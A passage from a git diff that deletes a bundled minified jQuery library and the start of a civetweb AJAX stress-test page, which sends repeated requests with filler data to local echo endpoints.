a.style.opacity}}},cssNumber:{fillOpacity:!0,fontWeight:!0,lineHeight:!0,opacity:!0,orphans:!0,widows:!0,zIndex:!0,zoom:!0},cssProps:{"float":f.support.cssFloat?"cssFloat":"styleFloat"},style:function(a,c,d,e){if(!!a&&a.nodeType!==3&&a.nodeType!==8&&!!a.style){var g,h,i=f.camelCase(c),j=a.style,k=f.cssHooks[i];c=f.cssProps[i]||i;if(d===b){if(k&&"get"in k&&(g=k.get(a,!1,e))!==b)return g;return j[c]}h=typeof d,h==="string"&&(g=bv.exec(d))&&(d=+(g[1]+1)*+g[2]+parseFloat(f.css(a,c)),h="number");if(d==null||h==="number"&&isNaN(d))return;h==="number"&&!f.cssNumber[i]&&(d+="px");if(!k||!("set"in k)||(d=k.set(a,d))!==b)try{j[c]=d}catch(l){}}},css:function(a,c,d){var e,g;c=f.camelCase(c),g=f.cssHooks[c],c=f.cssProps[c]||c,c==="cssFloat"&&(c="float");if(g&&"get"in g&&(e=g.get(a,!0,d))!==b)return e;if(bz)return bz(a,c)},swap:function(a,b,c){var d={};for(var e in b)d[e]=a.style[e],a.style[e]=b[e];c.call(a);for(e in b)a.style[e]=d[e]}}),f.curCSS=f.css,f.each(["height","width"],function(a,b){f.cssHooks[b]={get:function(a,c,d){var e;if(c){if(a.offsetWidth!==0)return bC(a,b,d);f.swap(a,bw,function(){e=bC(a,b,d)});return e}},set:function(a,b){if(!bt.test(b))return b;b=parseFloat(b);if(b>=0)return b+"px"}}}),f.support.opacity||(f.cssHooks.opacity={get:function(a,b){return br.test((b&&a.currentStyle?a.currentStyle.filter:a.style.filter)||"")?parseFloat(RegExp.$1)/100+"":b?"1":""},set:function(a,b){var c=a.style,d=a.currentStyle,e=f.isNumeric(b)?"alpha(opacity="+b*100+")":"",g=d&&d.filter||c.filter||"";c.zoom=1;if(b>=1&&f.trim(g.replace(bq,""))===""){c.removeAttribute("filter");if(d&&!d.filter)return}c.filter=bq.test(g)?g.replace(bq,e):g+" "+e}}),f(function(){f.support.reliableMarginRight||(f.cssHooks.marginRight={get:function(a,b){var c;f.swap(a,{display:"inline-block"},function(){b?c=bz(a,"margin-right","marginRight"):c=a.style.marginRight});return c}})}),c.defaultView&&c.defaultView.getComputedStyle&&(bA=function(a,b){var 
c,d,e;b=b.replace(bs,"-$1").toLowerCase(),(d=a.ownerDocument.defaultView)&&(e=d.getComputedStyle(a,null))&&(c=e.getPropertyValue(b),c===""&&!f.contains(a.ownerDocument.documentElement,a)&&(c=f.style(a,b)));return c}),c.documentElement.currentStyle&&(bB=function(a,b){var c,d,e,f=a.currentStyle&&a.currentStyle[b],g=a.style;f===null&&g&&(e=g[b])&&(f=e),!bt.test(f)&&bu.test(f)&&(c=g.left,d=a.runtimeStyle&&a.runtimeStyle.left,d&&(a.runtimeStyle.left=a.currentStyle.left),g.left=b==="fontSize"?"1em":f||0,f=g.pixelLeft+"px",g.left=c,d&&(a.runtimeStyle.left=d));return f===""?"auto":f}),bz=bA||bB,f.expr&&f.expr.filters&&(f.expr.filters.hidden=function(a){var b=a.offsetWidth,c=a.offsetHeight;return b===0&&c===0||!f.support.reliableHiddenOffsets&&(a.style&&a.style.display||f.css(a,"display"))==="none"},f.expr.filters.visible=function(a){return!f.expr.filters.hidden(a)});var bD=/%20/g,bE=/\[\]$/,bF=/\r?\n/g,bG=/#.*$/,bH=/^(.*?):[ \t]*([^\r\n]*)\r?$/mg,bI=/^(?:color|date|datetime|datetime-local|email|hidden|month|number|password|range|search|tel|text|time|url|week)$/i,bJ=/^(?:about|app|app\-storage|.+\-extension|file|res|widget):$/,bK=/^(?:GET|HEAD)$/,bL=/^\/\//,bM=/\?/,bN=/<script\b[^<]*(?:(?!<\/script>)<[^<]*)*<\/script>/gi,bO=/^(?:select|textarea)/i,bP=/\s+/,bQ=/([?&])_=[^&]*/,bR=/^([\w\+\.\-]+:)(?:\/\/([^\/?#:]*)(?::(\d+))?)?/,bS=f.fn.load,bT={},bU={},bV,bW,bX=["*/"]+["*"];try{bV=e.href}catch(bY){bV=c.createElement("a"),bV.href="",bV=bV.href}bW=bR.exec(bV.toLowerCase())||[],f.fn.extend({load:function(a,c,d){if(typeof a!="string"&&bS)return bS.apply(this,arguments);if(!this.length)return this;var e=a.indexOf(" ");if(e>=0){var g=a.slice(e,a.length);a=a.slice(0,e)}var h="GET";c&&(f.isFunction(c)?(d=c,c=b):typeof c=="object"&&(c=f.param(c,f.ajaxSettings.traditional),h="POST"));var 
i=this;f.ajax({url:a,type:h,dataType:"html",data:c,complete:function(a,b,c){c=a.responseText,a.isResolved()&&(a.done(function(a){c=a}),i.html(g?f("<div>").append(c.replace(bN,"")).find(g):c)),d&&i.each(d,[c,b,a])}});return this},serialize:function(){return f.param(this.serializeArray())},serializeArray:function(){return this.map(function(){return this.elements?f.makeArray(this.elements):this}).filter(function(){return this.name&&!this.disabled&&(this.checked||bO.test(this.nodeName)||bI.test(this.type))}).map(function(a,b){var c=f(this).val();return c==null?null:f.isArray(c)?f.map(c,function(a,c){return{name:b.name,value:a.replace(bF,"\r\n")}}):{name:b.name,value:c.replace(bF,"\r\n")}}).get()}}),f.each("ajaxStart ajaxStop ajaxComplete ajaxError ajaxSuccess ajaxSend".split(" "),function(a,b){f.fn[b]=function(a){return this.on(b,a)}}),f.each(["get","post"],function(a,c){f[c]=function(a,d,e,g){f.isFunction(d)&&(g=g||e,e=d,d=b);return f.ajax({type:c,url:a,data:d,success:e,dataType:g})}}),f.extend({getScript:function(a,c){return f.get(a,b,c,"script")},getJSON:function(a,b,c){return f.get(a,b,c,"json")},ajaxSetup:function(a,b){b?b_(a,f.ajaxSettings):(b=a,a=f.ajaxSettings),b_(a,b);return a},ajaxSettings:{url:bV,isLocal:bJ.test(bW[1]),global:!0,type:"GET",contentType:"application/x-www-form-urlencoded",processData:!0,async:!0,accepts:{xml:"application/xml, text/xml",html:"text/html",text:"text/plain",json:"application/json, text/javascript","*":bX},contents:{xml:/xml/,html:/html/,json:/json/},responseFields:{xml:"responseXML",text:"responseText"},converters:{"* text":a.String,"text html":!0,"text json":f.parseJSON,"text xml":f.parseXML},flatOptions:{context:!0,url:!0}},ajaxPrefilter:bZ(bT),ajaxTransport:bZ(bU),ajax:function(a,c){function w(a,c,l,m){if(s!==2){s=2,q&&clearTimeout(q),p=b,n=m||"",v.readyState=a>0?4:0;var 
o,r,u,w=c,x=l?cb(d,v,l):b,y,z;if(a>=200&&a<300||a===304){if(d.ifModified){if(y=v.getResponseHeader("Last-Modified"))f.lastModified[k]=y;if(z=v.getResponseHeader("Etag"))f.etag[k]=z}if(a===304)w="notmodified",o=!0;else try{r=cc(d,x),w="success",o=!0}catch(A){w="parsererror",u=A}}else{u=w;if(!w||a)w="error",a<0&&(a=0)}v.status=a,v.statusText=""+(c||w),o?h.resolveWith(e,[r,w,v]):h.rejectWith(e,[v,w,u]),v.statusCode(j),j=b,t&&g.trigger("ajax"+(o?"Success":"Error"),[v,d,o?r:u]),i.fireWith(e,[v,w]),t&&(g.trigger("ajaxComplete",[v,d]),--f.active||f.event.trigger("ajaxStop"))}}typeof a=="object"&&(c=a,a=b),c=c||{};var d=f.ajaxSetup({},c),e=d.context||d,g=e!==d&&(e.nodeType||e instanceof f)?f(e):f.event,h=f.Deferred(),i=f.Callbacks("once memory"),j=d.statusCode||{},k,l={},m={},n,o,p,q,r,s=0,t,u,v={readyState:0,setRequestHeader:function(a,b){if(!s){var c=a.toLowerCase();a=m[c]=m[c]||a,l[a]=b}return this},getAllResponseHeaders:function(){return s===2?n:null},getResponseHeader:function(a){var c;if(s===2){if(!o){o={};while(c=bH.exec(n))o[c[1].toLowerCase()]=c[2]}c=o[a.toLowerCase()]}return c===b?null:c},overrideMimeType:function(a){s||(d.mimeType=a);return this},abort:function(a){a=a||"abort",p&&p.abort(a),w(0,a);return this}};h.promise(v),v.success=v.done,v.error=v.fail,v.complete=i.add,v.statusCode=function(a){if(a){var b;if(s<2)for(b in a)j[b]=[j[b],a[b]];else b=a[v.status],v.then(b,b)}return this},d.url=((a||d.url)+"").replace(bG,"").replace(bL,bW[1]+"//"),d.dataTypes=f.trim(d.dataType||"*").toLowerCase().split(bP),d.crossDomain==null&&(r=bR.exec(d.url.toLowerCase()),d.crossDomain=!(!r||r[1]==bW[1]&&r[2]==bW[2]&&(r[3]||(r[1]==="http:"?80:443))==(bW[3]||(bW[1]==="http:"?80:443)))),d.data&&d.processData&&typeof 
d.data!="string"&&(d.data=f.param(d.data,d.traditional)),b$(bT,d,c,v);if(s===2)return!1;t=d.global,d.type=d.type.toUpperCase(),d.hasContent=!bK.test(d.type),t&&f.active++===0&&f.event.trigger("ajaxStart");if(!d.hasContent){d.data&&(d.url+=(bM.test(d.url)?"&":"?")+d.data,delete d.data),k=d.url;if(d.cache===!1){var x=f.now(),y=d.url.replace(bQ,"$1_="+x);d.url=y+(y===d.url?(bM.test(d.url)?"&":"?")+"_="+x:"")}}(d.data&&d.hasContent&&d.contentType!==!1||c.contentType)&&v.setRequestHeader("Content-Type",d.contentType),d.ifModified&&(k=k||d.url,f.lastModified[k]&&v.setRequestHeader("If-Modified-Since",f.lastModified[k]),f.etag[k]&&v.setRequestHeader("If-None-Match",f.etag[k])),v.setRequestHeader("Accept",d.dataTypes[0]&&d.accepts[d.dataTypes[0]]?d.accepts[d.dataTypes[0]]+(d.dataTypes[0]!=="*"?", "+bX+"; q=0.01":""):d.accepts["*"]);for(u in d.headers)v.setRequestHeader(u,d.headers[u]);if(d.beforeSend&&(d.beforeSend.call(e,v,d)===!1||s===2)){v.abort();return!1}for(u in{success:1,error:1,complete:1})v[u](d[u]);p=b$(bU,d,c,v);if(!p)w(-1,"No Transport");else{v.readyState=1,t&&g.trigger("ajaxSend",[v,d]),d.async&&d.timeout>0&&(q=setTimeout(function(){v.abort("timeout")},d.timeout));try{s=1,p.send(l,w)}catch(z){if(s<2)w(-1,z);else throw z}}return v},param:function(a,c){var d=[],e=function(a,b){b=f.isFunction(b)?b():b,d[d.length]=encodeURIComponent(a)+"="+encodeURIComponent(b)};c===b&&(c=f.ajaxSettings.traditional);if(f.isArray(a)||a.jquery&&!f.isPlainObject(a))f.each(a,function(){e(this.name,this.value)});else for(var g in a)ca(g,a[g],c,e);return d.join("&").replace(bD,"+")}}),f.extend({active:0,lastModified:{},etag:{}});var cd=f.now(),ce=/(\=)\?(&|$)|\?\?/i;f.ajaxSetup({jsonp:"callback",jsonpCallback:function(){return f.expando+"_"+cd++}}),f.ajaxPrefilter("json jsonp",function(b,c,d){var e=b.contentType==="application/x-www-form-urlencoded"&&typeof b.data=="string";if(b.dataTypes[0]==="jsonp"||b.jsonp!==!1&&(ce.test(b.url)||e&&ce.test(b.data))){var 
g,h=b.jsonpCallback=f.isFunction(b.jsonpCallback)?b.jsonpCallback():b.jsonpCallback,i=a[h],j=b.url,k=b.data,l="$1"+h+"$2";b.jsonp!==!1&&(j=j.replace(ce,l),b.url===j&&(e&&(k=k.replace(ce,l)),b.data===k&&(j+=(/\?/.test(j)?"&":"?")+b.jsonp+"="+h))),b.url=j,b.data=k,a[h]=function(a){g=[a]},d.always(function(){a[h]=i,g&&f.isFunction(i)&&a[h](g[0])}),b.converters["script json"]=function(){g||f.error(h+" was not called");return g[0]},b.dataTypes[0]="json";return"script"}}),f.ajaxSetup({accepts:{script:"text/javascript, application/javascript, application/ecmascript, application/x-ecmascript"},contents:{script:/javascript|ecmascript/},converters:{"text script":function(a){f.globalEval(a);return a}}}),f.ajaxPrefilter("script",function(a){a.cache===b&&(a.cache=!1),a.crossDomain&&(a.type="GET",a.global=!1)}),f.ajaxTransport("script",function(a){if(a.crossDomain){var d,e=c.head||c.getElementsByTagName("head")[0]||c.documentElement;return{send:function(f,g){d=c.createElement("script"),d.async="async",a.scriptCharset&&(d.charset=a.scriptCharset),d.src=a.url,d.onload=d.onreadystatechange=function(a,c){if(c||!d.readyState||/loaded|complete/.test(d.readyState))d.onload=d.onreadystatechange=null,e&&d.parentNode&&e.removeChild(d),d=b,c||g(200,"success")},e.insertBefore(d,e.firstChild)},abort:function(){d&&d.onload(0,1)}}}});var cf=a.ActiveXObject?function(){for(var a in ch)ch[a](0,1)}:!1,cg=0,ch;f.ajaxSettings.xhr=a.ActiveXObject?function(){return!this.isLocal&&ci()||cj()}:ci,function(a){f.extend(f.support,{ajax:!!a,cors:!!a&&"withCredentials"in a})}(f.ajaxSettings.xhr()),f.support.ajax&&f.ajaxTransport(function(c){if(!c.crossDomain||f.support.cors){var d;return{send:function(e,g){var h=c.xhr(),i,j;c.username?h.open(c.type,c.url,c.async,c.username,c.password):h.open(c.type,c.url,c.async);if(c.xhrFields)for(j in 
c.xhrFields)h[j]=c.xhrFields[j];c.mimeType&&h.overrideMimeType&&h.overrideMimeType(c.mimeType),!c.crossDomain&&!e["X-Requested-With"]&&(e["X-Requested-With"]="XMLHttpRequest");try{for(j in e)h.setRequestHeader(j,e[j])}catch(k){}h.send(c.hasContent&&c.data||null),d=function(a,e){var j,k,l,m,n;try{if(d&&(e||h.readyState===4)){d=b,i&&(h.onreadystatechange=f.noop,cf&&delete ch[i]);if(e)h.readyState!==4&&h.abort();else{j=h.status,l=h.getAllResponseHeaders(),m={},n=h.responseXML,n&&n.documentElement&&(m.xml=n),m.text=h.responseText;try{k=h.statusText}catch(o){k=""}!j&&c.isLocal&&!c.crossDomain?j=m.text?200:404:j===1223&&(j=204)}}}catch(p){e||g(-1,p)}m&&g(j,k,m,l)},!c.async||h.readyState===4?d():(i=++cg,cf&&(ch||(ch={},f(a).unload(cf)),ch[i]=d),h.onreadystatechange=d)},abort:function(){d&&d(0,1)}}}});var ck={},cl,cm,cn=/^(?:toggle|show|hide)$/,co=/^([+\-]=)?([\d+.\-]+)([a-z%]*)$/i,cp,cq=[["height","marginTop","marginBottom","paddingTop","paddingBottom"],["width","marginLeft","marginRight","paddingLeft","paddingRight"],["opacity"]],cr;f.fn.extend({show:function(a,b,c){var d,e;if(a||a===0)return this.animate(cu("show",3),a,b,c);for(var g=0,h=this.length;g<h;g++)d=this[g],d.style&&(e=d.style.display,!f._data(d,"olddisplay")&&e==="none"&&(e=d.style.display=""),e===""&&f.css(d,"display")==="none"&&f._data(d,"olddisplay",cv(d.nodeName)));for(g=0;g<h;g++){d=this[g];if(d.style){e=d.style.display;if(e===""||e==="none")d.style.display=f._data(d,"olddisplay")||""}}return this},hide:function(a,b,c){if(a||a===0)return this.animate(cu("hide",3),a,b,c);var d,e,g=0,h=this.length;for(;g<h;g++)d=this[g],d.style&&(e=f.css(d,"display"),e!=="none"&&!f._data(d,"olddisplay")&&f._data(d,"olddisplay",e));for(g=0;g<h;g++)this[g].style&&(this[g].style.display="none");return this},_toggle:f.fn.toggle,toggle:function(a,b,c){var d=typeof a=="boolean";f.isFunction(a)&&f.isFunction(b)?this._toggle.apply(this,arguments):a==null||d?this.each(function(){var 
b=d?a:f(this).is(":hidden");f(this)[b?"show":"hide"]()}):this.animate(cu("toggle",3),a,b,c);return this},fadeTo:function(a,b,c,d){return this.filter(":hidden").css("opacity",0).show().end().animate({opacity:b},a,c,d)},animate:function(a,b,c,d){function g(){e.queue===!1&&f._mark(this);var b=f.extend({},e),c=this.nodeType===1,d=c&&f(this).is(":hidden"),g,h,i,j,k,l,m,n,o;b.animatedProperties={};for(i in a){g=f.camelCase(i),i!==g&&(a[g]=a[i],delete a[i]),h=a[g],f.isArray(h)?(b.animatedProperties[g]=h[1],h=a[g]=h[0]):b.animatedProperties[g]=b.specialEasing&&b.specialEasing[g]||b.easing||"swing";if(h==="hide"&&d||h==="show"&&!d)return b.complete.call(this);c&&(g==="height"||g==="width")&&(b.overflow=[this.style.overflow,this.style.overflowX,this.style.overflowY],f.css(this,"display")==="inline"&&f.css(this,"float")==="none"&&(!f.support.inlineBlockNeedsLayout||cv(this.nodeName)==="inline"?this.style.display="inline-block":this.style.zoom=1))}b.overflow!=null&&(this.style.overflow="hidden");for(i in a)j=new f.fx(this,b,i),h=a[i],cn.test(h)?(o=f._data(this,"toggle"+i)||(h==="toggle"?d?"show":"hide":0),o?(f._data(this,"toggle"+i,o==="show"?"hide":"show"),j[o]()):j[h]()):(k=co.exec(h),l=j.cur(),k?(m=parseFloat(k[2]),n=k[3]||(f.cssNumber[i]?"":"px"),n!=="px"&&(f.style(this,i,(m||1)+n),l=(m||1)/j.cur()*l,f.style(this,i,l+n)),k[1]&&(m=(k[1]==="-="?-1:1)*m+l),j.custom(l,m,n)):j.custom(l,h,""));return!0}var e=f.speed(b,c,d);if(f.isEmptyObject(a))return this.each(e.complete,[!1]);a=f.extend({},a);return e.queue===!1?this.each(g):this.queue(e.queue,g)},stop:function(a,c,d){typeof a!="string"&&(d=c,c=a,a=b),c&&a!==!1&&this.queue(a||"fx",[]);return this.each(function(){function h(a,b,c){var e=b[c];f.removeData(a,c,!0),e.stop(d)}var b,c=!1,e=f.timers,g=f._data(this);d||f._unmark(!0,this);if(a==null)for(b in g)g[b]&&g[b].stop&&b.indexOf(".run")===b.length-4&&h(this,g,b);else 
g[b=a+".run"]&&g[b].stop&&h(this,g,b);for(b=e.length;b--;)e[b].elem===this&&(a==null||e[b].queue===a)&&(d?e[b](!0):e[b].saveState(),c=!0,e.splice(b,1));(!d||!c)&&f.dequeue(this,a)})}}),f.each({slideDown:cu("show",1),slideUp:cu("hide",1),slideToggle:cu("toggle",1),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"},fadeToggle:{opacity:"toggle"}},function(a,b){f.fn[a]=function(a,c,d){return this.animate(b,a,c,d)}}),f.extend({speed:function(a,b,c){var d=a&&typeof a=="object"?f.extend({},a):{complete:c||!c&&b||f.isFunction(a)&&a,duration:a,easing:c&&b||b&&!f.isFunction(b)&&b};d.duration=f.fx.off?0:typeof d.duration=="number"?d.duration:d.duration in f.fx.speeds?f.fx.speeds[d.duration]:f.fx.speeds._default;if(d.queue==null||d.queue===!0)d.queue="fx";d.old=d.complete,d.complete=function(a){f.isFunction(d.old)&&d.old.call(this),d.queue?f.dequeue(this,d.queue):a!==!1&&f._unmark(this)};return d},easing:{linear:function(a,b,c,d){return c+d*a},swing:function(a,b,c,d){return(-Math.cos(a*Math.PI)/2+.5)*d+c}},timers:[],fx:function(a,b,c){this.options=b,this.elem=a,this.prop=c,b.orig=b.orig||{}}}),f.fx.prototype={update:function(){this.options.step&&this.options.step.call(this.elem,this.now,this),(f.fx.step[this.prop]||f.fx.step._default)(this)},cur:function(){if(this.elem[this.prop]!=null&&(!this.elem.style||this.elem.style[this.prop]==null))return this.elem[this.prop];var a,b=f.css(this.elem,this.prop);return isNaN(a=parseFloat(b))?!b||b==="auto"?0:b:a},custom:function(a,c,d){function h(a){return e.step(a)}var e=this,g=f.fx;this.startTime=cr||cs(),this.end=c,this.now=this.start=a,this.pos=this.state=0,this.unit=d||this.unit||(f.cssNumber[this.prop]?"":"px"),h.queue=this.options.queue,h.elem=this.elem,h.saveState=function(){e.options.hide&&f._data(e.elem,"fxshow"+e.prop)===b&&f._data(e.elem,"fxshow"+e.prop,e.start)},h()&&f.timers.push(h)&&!cp&&(cp=setInterval(g.tick,g.interval))},show:function(){var 
a=f._data(this.elem,"fxshow"+this.prop);this.options.orig[this.prop]=a||f.style(this.elem,this.prop),this.options.show=!0,a!==b?this.custom(this.cur(),a):this.custom(this.prop==="width"||this.prop==="height"?1:0,this.cur()),f(this.elem).show()},hide:function(){this.options.orig[this.prop]=f._data(this.elem,"fxshow"+this.prop)||f.style(this.elem,this.prop),this.options.hide=!0,this.custom(this.cur(),0)},step:function(a){var b,c,d,e=cr||cs(),g=!0,h=this.elem,i=this.options;if(a||e>=i.duration+this.startTime){this.now=this.end,this.pos=this.state=1,this.update(),i.animatedProperties[this.prop]=!0;for(b in i.animatedProperties)i.animatedProperties[b]!==!0&&(g=!1);if(g){i.overflow!=null&&!f.support.shrinkWrapBlocks&&f.each(["","X","Y"],function(a,b){h.style["overflow"+b]=i.overflow[a]}),i.hide&&f(h).hide();if(i.hide||i.show)for(b in i.animatedProperties)f.style(h,b,i.orig[b]),f.removeData(h,"fxshow"+b,!0),f.removeData(h,"toggle"+b,!0);d=i.complete,d&&(i.complete=!1,d.call(h))}return!1}i.duration==Infinity?this.now=e:(c=e-this.startTime,this.state=c/i.duration,this.pos=f.easing[i.animatedProperties[this.prop]](this.state,c,0,1,i.duration),this.now=this.start+(this.end-this.start)*this.pos),this.update();return!0}},f.extend(f.fx,{tick:function(){var a,b=f.timers,c=0;for(;c<b.length;c++)a=b[c],!a()&&b[c]===a&&b.splice(c--,1);b.length||f.fx.stop()},interval:13,stop:function(){clearInterval(cp),cp=null},speeds:{slow:600,fast:200,_default:400},step:{opacity:function(a){f.style(a.elem,"opacity",a.now)},_default:function(a){a.elem.style&&a.elem.style[a.prop]!=null?a.elem.style[a.prop]=a.now+a.unit:a.elem[a.prop]=a.now}}}),f.each(["width","height"],function(a,b){f.fx.step[b]=function(a){f.style(a.elem,b,Math.max(0,a.now)+a.unit)}}),f.expr&&f.expr.filters&&(f.expr.filters.animated=function(a){return f.grep(f.timers,function(b){return a===b.elem}).length});var cw=/^t(?:able|d|h)$/i,cx=/^(?:body|html)$/i;"getBoundingClientRect"in c.documentElement?f.fn.offset=function(a){var 
b=this[0],c;if(a)return this.each(function(b){f.offset.setOffset(this,a,b)});if(!b||!b.ownerDocument)return null;if(b===b.ownerDocument.body)return f.offset.bodyOffset(b);try{c=b.getBoundingClientRect()}catch(d){}var e=b.ownerDocument,g=e.documentElement;if(!c||!f.contains(g,b))return c?{top:c.top,left:c.left}:{top:0,left:0};var h=e.body,i=cy(e),j=g.clientTop||h.clientTop||0,k=g.clientLeft||h.clientLeft||0,l=i.pageYOffset||f.support.boxModel&&g.scrollTop||h.scrollTop,m=i.pageXOffset||f.support.boxModel&&g.scrollLeft||h.scrollLeft,n=c.top+l-j,o=c.left+m-k;return{top:n,left:o}}:f.fn.offset=function(a){var b=this[0];if(a)return this.each(function(b){f.offset.setOffset(this,a,b)});if(!b||!b.ownerDocument)return null;if(b===b.ownerDocument.body)return f.offset.bodyOffset(b);var c,d=b.offsetParent,e=b,g=b.ownerDocument,h=g.documentElement,i=g.body,j=g.defaultView,k=j?j.getComputedStyle(b,null):b.currentStyle,l=b.offsetTop,m=b.offsetLeft;while((b=b.parentNode)&&b!==i&&b!==h){if(f.support.fixedPosition&&k.position==="fixed")break;c=j?j.getComputedStyle(b,null):b.currentStyle,l-=b.scrollTop,m-=b.scrollLeft,b===d&&(l+=b.offsetTop,m+=b.offsetLeft,f.support.doesNotAddBorder&&(!f.support.doesAddBorderForTableAndCells||!cw.test(b.nodeName))&&(l+=parseFloat(c.borderTopWidth)||0,m+=parseFloat(c.borderLeftWidth)||0),e=d,d=b.offsetParent),f.support.subtractsBorderForOverflowNotVisible&&c.overflow!=="visible"&&(l+=parseFloat(c.borderTopWidth)||0,m+=parseFloat(c.borderLeftWidth)||0),k=c}if(k.position==="relative"||k.position==="static")l+=i.offsetTop,m+=i.offsetLeft;f.support.fixedPosition&&k.position==="fixed"&&(l+=Math.max(h.scrollTop,i.scrollTop),m+=Math.max(h.scrollLeft,i.scrollLeft));return{top:l,left:m}},f.offset={bodyOffset:function(a){var b=a.offsetTop,c=a.offsetLeft;f.support.doesNotIncludeMarginInBodyOffset&&(b+=parseFloat(f.css(a,"marginTop"))||0,c+=parseFloat(f.css(a,"marginLeft"))||0);return{top:b,left:c}},setOffset:function(a,b,c){var 
d=f.css(a,"position");d==="static"&&(a.style.position="relative");var e=f(a),g=e.offset(),h=f.css(a,"top"),i=f.css(a,"left"),j=(d==="absolute"||d==="fixed")&&f.inArray("auto",[h,i])>-1,k={},l={},m,n;j?(l=e.position(),m=l.top,n=l.left):(m=parseFloat(h)||0,n=parseFloat(i)||0),f.isFunction(b)&&(b=b.call(a,c,g)),b.top!=null&&(k.top=b.top-g.top+m),b.left!=null&&(k.left=b.left-g.left+n),"using"in b?b.using.call(a,k):e.css(k)}},f.fn.extend({position:function(){if(!this[0])return null;var a=this[0],b=this.offsetParent(),c=this.offset(),d=cx.test(b[0].nodeName)?{top:0,left:0}:b.offset();c.top-=parseFloat(f.css(a,"marginTop"))||0,c.left-=parseFloat(f.css(a,"marginLeft"))||0,d.top+=parseFloat(f.css(b[0],"borderTopWidth"))||0,d.left+=parseFloat(f.css(b[0],"borderLeftWidth"))||0;return{top:c.top-d.top,left:c.left-d.left}},offsetParent:function(){return this.map(function(){var a=this.offsetParent||c.body;while(a&&!cx.test(a.nodeName)&&f.css(a,"position")==="static")a=a.offsetParent;return a})}}),f.each(["Left","Top"],function(a,c){var d="scroll"+c;f.fn[d]=function(c){var e,g;if(c===b){e=this[0];if(!e)return null;g=cy(e);return g?"pageXOffset"in g?g[a?"pageYOffset":"pageXOffset"]:f.support.boxModel&&g.document.documentElement[d]||g.document.body[d]:e[d]}return this.each(function(){g=cy(this),g?g.scrollTo(a?f(g).scrollLeft():c,a?c:f(g).scrollTop()):this[d]=c})}}),f.each(["Height","Width"],function(a,c){var d=c.toLowerCase();f.fn["inner"+c]=function(){var a=this[0];return a?a.style?parseFloat(f.css(a,d,"padding")):this[d]():null},f.fn["outer"+c]=function(a){var b=this[0];return b?b.style?parseFloat(f.css(b,d,a?"margin":"border")):this[d]():null},f.fn[d]=function(a){var e=this[0];if(!e)return a==null?null:this;if(f.isFunction(a))return this.each(function(b){var c=f(this);c[d](a.call(this,b,c[d]()))});if(f.isWindow(e)){var g=e.document.documentElement["client"+c],h=e.document.body;return e.document.compatMode==="CSS1Compat"&&g||h&&h["client"+c]||g}if(e.nodeType===9)return 
Math.max(e.documentElement["client"+c],e.body["scroll"+c],e.documentElement["scroll"+c],e.body["offset"+c],e.documentElement["offset"+c]);if(a===b){var i=f.css(e,d),j=parseFloat(i);return f.isNumeric(j)?j:i}return this.css(d,typeof a=="string"?a:a+"px")}}),a.jQuery=a.$=f,typeof define=="function"&&define.amd&&define.amd.jQuery&&define("jquery",[],function(){return f})})(window);
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/test/ajax/test.html b/thirdparty/civetweb-1.10/test/ajax/test.html
deleted file mode 100644
index 40fa079..0000000
--- a/thirdparty/civetweb-1.10/test/ajax/test.html
+++ /dev/null
@@ -1,168 +0,0 @@
-<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

-<html>

-  <head>

-    <title>Test</title>

-    <script type='text/javascript' language="javascript" src='jquery.js'></script>

-    <script type='text/javascript' language="javascript">

-    <!--

-

-    function mbox() {

-      alert('Javascript OK');

-    }

-

-

-    var totalCount = 10;

-    var pendingCount = 0;

-    var errorCount = 0;

-    var pushCount = 0;

-    var allErrorCount = 0;

-    var autoTest = false;

-    var testType = "cgi";

-

-    function NextTestType() {

-      if (testType == "cgi") testType = "lp";

-      else if (testType == "lp") testType = "lua";

-      else testType = "cgi";

-    }

-

-    function runTest(method, isAsync) {

-

-      ++pushCount;

-      document.getElementById('start').innerHTML = 'Test: ' + pushCount;

-      document.getElementById('resTotal').innerHTML = 'running';

-

-      for (var i = 1; i <= totalCount; ++i) {

-        document.getElementById('res'+i).innerHTML = "ready";

-      }

-

-      errorCount = 0;

-      pendingCount = totalCount;

-

-      for (var i = 1; i <= totalCount; ++i) {

-

-        fetch(i,  method, isAsync);

-      }

-    }

-    

-    function runAutoTest() {

-      if (autoTest) {

-        runTest("POST", true)

-        setTimeout("runAutoTest()", 250)

-      }

-    }

-

-

-    function fetch(id, method, isAsync) {

-

-      document.getElementById('res'+id).innerHTML = "pending";

-

-      $.ajax({

-        async: isAsync,

-        url: 'echo.' + testType + '?id=' + id,

-        type: method,

-        timeout: 2000,

-        data: { 'id' : id ,

-                'longText1' : "adfsdfasdklkjlgasfdfjkhq345sdafbmkanq3trsdghkjqw4etrjlkabsdfkabvauiregtlkjasdbvabl4btrjawebbfjsdhbjk342r5bjksdbfkljbhasdfbhj234qjhasdg76k11234jhv900adfasddsfmzasdfhjgajsvhgkjhasdf77aefcae4fkjzasdfgukeaf7dkkegasdfigjcvxgui",

-                'longText2' : "bsdfsdfasdklkjlgasdfjkhq345sdafbmkanq3trsdghkjqw4etrjlkabsdfkabvauiregtlkjasdbvabl4btrjawebbfjsdhbjk342r5bjksdbfkljbhasdfbhj234qjhasdg76k11234jhv900adfasddsfmzasdfhjgajsvhgkjhasdf77aefcae4fkjzasdfgukeaf7dkkegasdfigjcvxgui",

-                'longText3' : "sdfsadagsdklkjlgasdfjkhq345sdafbmkanq3trsdghkjqw4etrjlkabsdfkabvauiregtlkjasdbvabl4btrjawebbfjsdhbjk342r5bjksdbfkljbhasdfbhj234qjhasdg76k11234jhv900adfasddsfmzasdfhjgajsvhgkjhasdf77aefcae4fkjzasdfgukeaf7dkkegasdfigjcvxgui",

-                'longText4' : "q34sdfas3fhbkjlgasdfjkhq345sdafbmkanq3trsdghkjqw4etrjlkabsdfkabvauiregtlkjasdbvabl4btrjawebbfjsdhbjk342r5bjksdbfkljbhasdfbhj234qjhasdg76k11234jhv900adfasddsfmzasdfhjgajsvhgkjhasdf77aefcae4fkjzasdfgukeaf7dkkegasdfigjcvxgui",

-                'longText5' : "askj2kjcvxychklgasdfjkhq345sdafbmkanq3trsdghkjqw4etrjlkabsdfkabvauiregtlkjasdbvabl4btrjawebbfjsdhbjk342r5bjksdbfkljbhasdfbhj234qjhasdg76k11234jhv900adfasddsfmzasdfhjgajsvhgkjhasdf77aefcae4fkjzasdfgukeaf7dkkegasdfigjcvxgui",

